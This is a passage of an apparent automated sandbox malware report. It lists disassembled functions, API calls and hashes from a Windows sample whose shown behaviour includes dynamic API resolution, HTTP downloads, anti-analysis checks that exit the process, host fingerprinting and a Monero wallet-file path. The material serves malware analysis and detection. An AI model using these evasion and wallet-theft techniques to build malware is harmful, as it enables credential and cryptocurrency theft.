                            • GetProcAddress.KERNEL32(74EC0000,0107B9C8), ref: 003CA2B3
                            • GetProcAddress.KERNEL32(74EC0000,0107B7E8), ref: 003CA2CB
                            • GetProcAddress.KERNEL32(74EC0000,0108D308), ref: 003CA2E3
                            • GetProcAddress.KERNEL32(74EC0000,01075B70), ref: 003CA2FC
                            • GetProcAddress.KERNEL32(74EC0000,01075AF0), ref: 003CA314
                            • GetProcAddress.KERNEL32(74EC0000,0107B810), ref: 003CA32C
                            • GetProcAddress.KERNEL32(75BD0000,0108D188), ref: 003CA352
                            • GetProcAddress.KERNEL32(75BD0000,01075AB0), ref: 003CA36A
                            • GetProcAddress.KERNEL32(75BD0000,010892C8), ref: 003CA382
                            • GetProcAddress.KERNEL32(75BD0000,0108D398), ref: 003CA39B
                            • GetProcAddress.KERNEL32(75BD0000,0108D170), ref: 003CA3B3
                            • GetProcAddress.KERNEL32(75BD0000,01075E10), ref: 003CA3CB
                            • GetProcAddress.KERNEL32(75BD0000,01075C10), ref: 003CA3E4
                            • GetProcAddress.KERNEL32(75BD0000,0108D140), ref: 003CA3FC
                            • GetProcAddress.KERNEL32(75BD0000,0108D2A8), ref: 003CA414
                            • GetProcAddress.KERNEL32(75A70000,01075DD0), ref: 003CA436
                            • GetProcAddress.KERNEL32(75A70000,0108D248), ref: 003CA44E
                            • GetProcAddress.KERNEL32(75A70000,0108D3B0), ref: 003CA466
                            • GetProcAddress.KERNEL32(75A70000,0108D320), ref: 003CA47F
                            • GetProcAddress.KERNEL32(75A70000,0108D350), ref: 003CA497
                            • GetProcAddress.KERNEL32(75450000,01075BB0), ref: 003CA4B8
                            • GetProcAddress.KERNEL32(75450000,01075AD0), ref: 003CA4D1
                            • GetProcAddress.KERNEL32(75DA0000,01075E30), ref: 003CA4F2
                            • GetProcAddress.KERNEL32(75DA0000,0108D368), ref: 003CA50A
                            • GetProcAddress.KERNEL32(6F070000,01075CD0), ref: 003CA530
                            • GetProcAddress.KERNEL32(6F070000,01075CF0), ref: 003CA548
                            • GetProcAddress.KERNEL32(6F070000,01075BF0), ref: 003CA560
                            • GetProcAddress.KERNEL32(6F070000,0108D200), ref: 003CA579
                            • GetProcAddress.KERNEL32(6F070000,01075BD0), ref: 003CA591
                            • GetProcAddress.KERNEL32(6F070000,01075C50), ref: 003CA5A9
                            • GetProcAddress.KERNEL32(6F070000,01075DF0), ref: 003CA5C2
                            • GetProcAddress.KERNEL32(6F070000,01075D10), ref: 003CA5DA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 003CA5F1
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 003CA607
                            • GetProcAddress.KERNEL32(75AF0000,0108D3C8), ref: 003CA629
                            • GetProcAddress.KERNEL32(75AF0000,010892A8), ref: 003CA641
                            • GetProcAddress.KERNEL32(75AF0000,0108D260), ref: 003CA659
                            • GetProcAddress.KERNEL32(75AF0000,0108D230), ref: 003CA672
                            • GetProcAddress.KERNEL32(75D90000,01075D70), ref: 003CA693
                            • GetProcAddress.KERNEL32(6CFD0000,0108D278), ref: 003CA6B4
                            • GetProcAddress.KERNEL32(6CFD0000,01075B30), ref: 003CA6CD
                            • GetProcAddress.KERNEL32(6CFD0000,0108D110), ref: 003CA6E5
                            • GetProcAddress.KERNEL32(6CFD0000,0108D1D0), ref: 003CA6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 6383f7b9e8cfbae68a4be6e69121fdeece06ffb1962837e64f20d18b8ba68a07
                            • Instruction ID: 4bb6e9cd1f57b81c338ee2403ed6a875b4906cc145f0a81b7eccb3901f5db369
                            • Opcode Fuzzy Hash: 6383f7b9e8cfbae68a4be6e69121fdeece06ffb1962837e64f20d18b8ba68a07
                            • Instruction Fuzzy Hash: 1B626BF5502201AFC748EFA9ED88D7637F9F76C241704851AA60DC3269D77DA80AEB13
                            Function 003B6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 3b6280-3b630b call 3ca7a0 call 3b47b0 call 3ca740 InternetOpenA StrCmpCA 1040 3b630d 1033->1040 1041 3b6314-3b6318 1033->1041 1040->1041 1042 3b6509-3b6525 call 3ca7a0 call 3ca800 * 2 1041->1042 1043 3b631e-3b6342 InternetConnectA 1041->1043 1062 3b6528-3b652d 1042->1062 1045 3b6348-3b634c 1043->1045 1046 3b64ff-3b6503 InternetCloseHandle 1043->1046 1047 3b635a 1045->1047 1048 3b634e-3b6358 1045->1048 1046->1042 1050 3b6364-3b6392 HttpOpenRequestA 1047->1050 1048->1050 1052 3b6398-3b639c 1050->1052 1053 3b64f5-3b64f9 InternetCloseHandle 1050->1053 1055 3b639e-3b63bf InternetSetOptionA 1052->1055 1056 3b63c5-3b6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 3b642c-3b644b call 3c8940 1056->1058 1059 3b6407-3b6427 call 3ca740 call 3ca800 * 2 1056->1059 1066 3b64c9-3b64e9 call 3ca740 call 3ca800 * 2 1058->1066 1067 3b644d-3b6454 1058->1067 1059->1062 1066->1062 1069 3b64c7-3b64ef InternetCloseHandle 1067->1069 1070 3b6456-3b6480 InternetReadFile 1067->1070 1069->1053 1073 3b648b 1070->1073 1074 3b6482-3b6489 1070->1074 1073->1069 1074->1073 1078 3b648d-3b64c5 call 3ca9b0 call 3ca8a0 call 3ca800 1074->1078 1078->1070
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                              • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                            • StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B6303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                            • HttpOpenRequestA.WININET(00000000,GET,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B6385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003B63FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B646D
                            • InternetCloseHandle.WININET(00000000), ref: 003B64EF
                            • InternetCloseHandle.WININET(00000000), ref: 003B64F9
                            • InternetCloseHandle.WININET(00000000), ref: 003B6503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: fc97f45a9bb0fdf2832f41c7a2b094de4e0813d26ed7df77efc03b8cb2afa5f2
                            • Instruction ID: 57935fe887dc330a179c915dc9b75f6ca30ed45f3ffea34f32011d032ee37fa3
                            • Opcode Fuzzy Hash: fc97f45a9bb0fdf2832f41c7a2b094de4e0813d26ed7df77efc03b8cb2afa5f2
                            • Instruction Fuzzy Hash: F4717F71A00308ABDB25EB90DC49FEE7778FB44704F108059F209AB591DBB86E85DF52
                            Function 003C5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 3c5510-3c5577 call 3c5ad0 call 3ca820 * 3 call 3ca740 * 4 1106 3c557c-3c5583 1090->1106 1107 3c5585-3c55b6 call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 1106->1107 1108 3c55d7-3c564c call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1106->1108 1124 3c55bb-3c55d2 call 3ca8a0 call 3ca800 1107->1124 1134 3c5693-3c56a9 call 3caad0 StrCmpCA 1108->1134 1138 3c564e-3c568e call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1108->1138 1124->1134 1139 3c57dc-3c5844 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1134->1139 1140 3c56af-3c56b6 1134->1140 1138->1134 1270 3c5ac3-3c5ac6 1139->1270 1144 3c56bc-3c56c3 1140->1144 1145 3c57da-3c585f call 3caad0 StrCmpCA 1140->1145 1149 3c571e-3c5793 call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1144->1149 1150 3c56c5-3c5719 call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1144->1150 1164 3c5865-3c586c 1145->1164 1165 3c5991-3c59f9 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1145->1165 1149->1145 1250 3c5795-3c57d5 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1149->1250 1150->1145 1171 3c598f-3c5a14 call 3caad0 StrCmpCA 1164->1171 1172 3c5872-3c5879 1164->1172 1165->1270 1201 3c5a28-3c5a91 call 3ca8a0 call 3ca820 * 2 call 3b1670 call 3ca800 * 4 call 3c6560 call 3b1550 1171->1201 1202 3c5a16-3c5a21 Sleep 1171->1202 1179 3c587b-3c58ce call 3ca820 call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1172->1179 1180 3c58d3-3c5948 call 3ca740 * 2 call 3b1590 call 3c52c0 call 3ca8a0 call 3ca800 call 3caad0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 3c594a-3c598a call 3ca7a0 call 3b1590 call 3c51f0 call 3ca8a0 call 3ca800 1180->1275 1201->1270 1202->1106 1250->1145 1275->1171
                            APIs
                              • Part of subcall function 003CA820: lstrlen.KERNEL32(003B4F05,?,?,003B4F05,003D0DDE), ref: 003CA82B
                              • Part of subcall function 003CA820: lstrcpy.KERNEL32(003D0DDE,00000000), ref: 003CA885
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C56A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5857
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5228
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5318
                              • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C532F
                              • Part of subcall function 003C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003C5364
                              • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C5383
                              • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C53AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5A0C
                            • Sleep.KERNEL32(0000EA60), ref: 003C5A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: ad45730601d9dd0c5998603a06b1e725334b1a4e0bcd6f02a921d7db567908ce
                            • Instruction ID: 54d980bb9d910f255f9e6129d7615281ed3b0eb0958e1cb51f41fc8a8079e50b
                            • Opcode Fuzzy Hash: ad45730601d9dd0c5998603a06b1e725334b1a4e0bcd6f02a921d7db567908ce
                            • Instruction Fuzzy Hash: D4E13E729106089BCB16FBA0DC56FFD7738AB54304F50812CB506EA591EF346E4DDBA2
                            Function 003C17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 3c17a0-3c17cd call 3caad0 StrCmpCA 1304 3c17cf-3c17d1 ExitProcess 1301->1304 1305 3c17d7-3c17f1 call 3caad0 1301->1305 1309 3c17f4-3c17f8 1305->1309 1310 3c17fe-3c1811 1309->1310 1311 3c19c2-3c19cd call 3ca800 1309->1311 1313 3c199e-3c19bd 1310->1313 1314 3c1817-3c181a 1310->1314 1313->1309 1316 3c185d-3c186e StrCmpCA 1314->1316 1317 3c187f-3c1890 StrCmpCA 1314->1317 1318 3c1835-3c1844 call 3ca820 1314->1318 1319 3c1970-3c1981 StrCmpCA 1314->1319 1320 3c18f1-3c1902 StrCmpCA 1314->1320 1321 3c1951-3c1962 StrCmpCA 1314->1321 1322 3c1932-3c1943 StrCmpCA 1314->1322 1323 3c1913-3c1924 StrCmpCA 1314->1323 1324 3c18ad-3c18be StrCmpCA 1314->1324 1325 3c18cf-3c18e0 StrCmpCA 1314->1325 1326 3c198f-3c1999 call 3ca820 1314->1326 1327 3c1849-3c1858 call 3ca820 1314->1327 1328 3c1821-3c1830 call 3ca820 1314->1328 1335 3c187a 1316->1335 1336 3c1870-3c1873 1316->1336 1337 3c189e-3c18a1 1317->1337 1338 3c1892-3c189c 1317->1338 1318->1313 1329 3c198d 1319->1329 1330 3c1983-3c1986 1319->1330 1343 3c190e 1320->1343 1344 3c1904-3c1907 1320->1344 1349 3c196e 1321->1349 1350 3c1964-3c1967 1321->1350 1347 3c194f 1322->1347 1348 3c1945-3c1948 1322->1348 1345 3c1926-3c1929 1323->1345 1346 3c1930 1323->1346 1339 3c18ca 1324->1339 1340 3c18c0-3c18c3 1324->1340 1341 3c18ec 1325->1341 1342 3c18e2-3c18e5 1325->1342 1326->1313 1327->1313 1328->1313 1329->1313 1330->1329 1335->1313 1336->1335 1355 3c18a8 1337->1355 1338->1355 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1346 1346->1313 1347->1313 1348->1347 1349->1313 1350->1349 1355->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 003C17C5
                            • ExitProcess.KERNEL32 ref: 003C17D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 7cf03fc493ef0b9d456ceef280f18f47f778fbd1be6e34afa97c02f735d6f2b2
                            • Instruction ID: 729b7de46330bdc9cf38ff87ca6ecead4419ad4a24751f9106a4ab4d13d7f20e
                            • Opcode Fuzzy Hash: 7cf03fc493ef0b9d456ceef280f18f47f778fbd1be6e34afa97c02f735d6f2b2
                            • Instruction Fuzzy Hash: 0E516AB5A04209EBCB06DFA0D954FBE77BAAF45704F10404DE40AEB241D774ED45EBA2
                            Function 003C7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 3c7500-3c754a GetWindowsDirectoryA 1357 3c754c 1356->1357 1358 3c7553-3c75c7 GetVolumeInformationA call 3c8d00 * 3 1356->1358 1357->1358 1365 3c75d8-3c75df 1358->1365 1366 3c75fc-3c7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 3c75e1-3c75fa call 3c8d00 1365->1367 1369 3c7628-3c7658 wsprintfA call 3ca740 1366->1369 1370 3c7619-3c7626 call 3ca740 1366->1370 1367->1365 1377 3c767e-3c768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003C7542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003C757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C760A
                            • wsprintfA.USER32 ref: 003C7640
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$=
                            • API String ID: 1544550907-3393898382
                            • Opcode ID: e1fd3e55b98d75c55d80ab9675ebad48fc5e9b808390dadb14ed3f3e8aae000a
                            • Instruction ID: 90ce733143e7006e1b3fa7292b20e2f947fd02ead15d49a79da4f873b68ce15c
                            • Opcode Fuzzy Hash: e1fd3e55b98d75c55d80ab9675ebad48fc5e9b808390dadb14ed3f3e8aae000a
                            • Instruction Fuzzy Hash: 634151B1D04258ABDB11DB94DC45FEEBBB8AB18704F10419DF509AB280D7786E44CFA6
                            Function 003C69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082368), ref: 003C98A1
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082308), ref: 003C98BA
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,010823C8), ref: 003C98D2
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082320), ref: 003C98EA
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082380), ref: 003C9903
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01089208), ref: 003C991B
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01075A50), ref: 003C9933
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01075A10), ref: 003C994C
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082248), ref: 003C9964
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,010824B8), ref: 003C997C
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082218), ref: 003C9995
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,010824D0), ref: 003C99AD
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,010757D0), ref: 003C99C5
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082398), ref: 003C99DE
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003B11D0: ExitProcess.KERNEL32 ref: 003B1211
                              • Part of subcall function 003B1160: GetSystemInfo.KERNEL32(?), ref: 003B116A
                              • Part of subcall function 003B1160: ExitProcess.KERNEL32 ref: 003B117E
                              • Part of subcall function 003B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003B112B
                              • Part of subcall function 003B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
                              • Part of subcall function 003B1110: ExitProcess.KERNEL32 ref: 003B1143
                              • Part of subcall function 003B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
                              • Part of subcall function 003B1220: ExitProcess.KERNEL32 ref: 003B1294
                              • Part of subcall function 003C6770: GetUserDefaultLangID.KERNEL32 ref: 003C6774
                              • Part of subcall function 003B1190: ExitProcess.KERNEL32 ref: 003B11C6
                              • Part of subcall function 003C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                              • Part of subcall function 003C7850: RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                              • Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                              • Part of subcall function 003C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                              • Part of subcall function 003C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                              • Part of subcall function 003C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
